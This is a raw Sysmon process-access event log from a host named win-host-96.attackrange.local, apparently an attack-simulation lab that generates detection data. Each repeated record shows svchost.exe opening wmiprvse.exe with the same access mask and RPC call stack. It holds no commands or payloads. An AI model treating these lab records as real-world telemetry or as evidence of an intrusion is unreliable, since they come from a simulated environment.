12:24:45.257{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292564Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.257{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292563Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.257{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292562Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.242{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292561Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.242{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292560Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.242{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292559Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.242{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292558Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.242{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292557Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.242{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292556Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.242{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292555Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.242{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292554Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.242{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292553Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.242{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292552Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.242{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292551Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.242{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292550Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.242{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292549Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.226{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292548Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.226{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292547Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.226{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292546Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.226{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292545Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.226{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292544Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.226{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292543Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.226{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292542Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.226{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292541Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 